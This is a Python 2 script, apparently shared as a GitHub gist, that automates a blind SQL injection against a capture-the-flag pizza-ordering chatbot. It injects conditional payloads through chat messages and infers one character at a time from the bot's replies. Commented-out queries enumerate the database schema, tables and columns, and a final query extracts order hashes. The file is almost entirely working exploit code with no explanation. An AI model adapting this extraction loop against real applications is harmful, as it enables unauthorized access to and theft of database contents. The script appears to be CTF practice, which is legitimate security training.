import requests, json, time | |
session = "aaa812cc572b27f73a336ccaf85277f9" | |
def getChat(): | |
url = "https://pizza.hacktivity.h1ctf.com/pizzabot?session={}&lastchat=0".format(session) | |
r = requests.get(url, headers = { | |
"Cookie": "session={}".format(session), | |
"X-Requested-With": "XMLHttpRequest" | |
}) | |
data = json.loads(r.text) | |
msg = data[-1]["message"] | |
msg = msg.replace('<div><span class="talk-pizzabot">PizzaBot:</span> ', '').replace('</div>','') | |
return msg | |
def sendMsg(msg): | |
url = "https://pizza.hacktivity.h1ctf.com/pizzabot" | |
r = requests.post(url, headers = { | |
"Cookie": "session={}".format(session), | |
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", | |
"X-Requested-With": "XMLHttpRequest" | |
}, data = { | |
"session": session, | |
"message": msg | |
}) | |
return r.text | |
def sendSqli(query): | |
# inject = "' or IF({},'true','false')='true".format(sqli) | |
# inject = "'+ifnull(({}),'0juv2f98')+'".format(sqli) | |
sendMsg('Order') | |
chatMsg = getChat() | |
time.sleep(0.5) | |
if "Sorry I don't recognise that order ID" in chatMsg: | |
sendMsg('Order') | |
else: | |
inject = "' or if(ifnull(({}),'1'),'1','0')='1".format(query) | |
result = sendMsg(inject) | |
sqliResult = getChat() | |
print sqliResult | |
if "Sorry I don't recognise that order ID" in sqliResult: | |
return True | |
elif "order is still out for delivery" in sqliResult: | |
return False | |
else: | |
print "unknown result: {}".format(sqliResult) | |
return True | |
''' | |
information_schema | |
h1pizza | |
order | |
delivered | |
hash | |
id | |
id = 1001 | |
hash = aau5.... | |
delivered = 0/1 | |
''' | |
def getData(): | |
tblName = "" | |
pos = 8 | |
while True: | |
# charSetToUse = list("$_abcdefghijklmnopqrstuvwxyz0123456789") | |
# charSetToUse = list("0123456789") | |
# charSetToUse = list("$_.!@#$%^&*()+-=,.<>") | |
# charSetToUse = list("h1pizza") | |
charSetToUse = list("0123456789abcdefghijklmnopqrstuvwxyz") | |
for char in charSetToUse: | |
if char == "_": | |
char = "\_" | |
tmpTblName = tblName+char | |
# Get schema name: | |
# query = "select schema_name from information_schema.schemata where schema_name='information_schema' limit 1" | |
# query = "select schema_name from information_schema.schemata where schema_name not in('information_schema') and schema_name like 'h1pizza%' and substr(schema_name,"+str(pos)+",1) = '"+char+"' limit 1" | |
# Get table name: | |
# query = "select table_name from information_schema.tables where table_schema like 'h1pizza%' and table_name not in('') and lower(table_name) like '"+tmpTblName+"%' limit 1" | |
# query = "select length(table_name) from information_schema.tables where table_schema LIKE 'h1pizza%' and length(table_name) LIKE '"+tmpTblName+"' limit 1" | |
# get column names: | |
# query = "select column_name from information_schema.columns where table_schema like 'h1pizza%' and table_name='order' and column_name not in('delivered','hash','id') and lower(column_name) like '"+tmpTblName+"%' limit 1" | |
query = "select hash from h1pizza.order where delivered=1 and hash like '"+tmpTblName+"%' AND hash not in('ul2hamz1') limit 1" | |
print query | |
if(sendSqli(query)): | |
tblName = tblName+char | |
print tblName | |
pos+=1 | |
break | |
getData() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment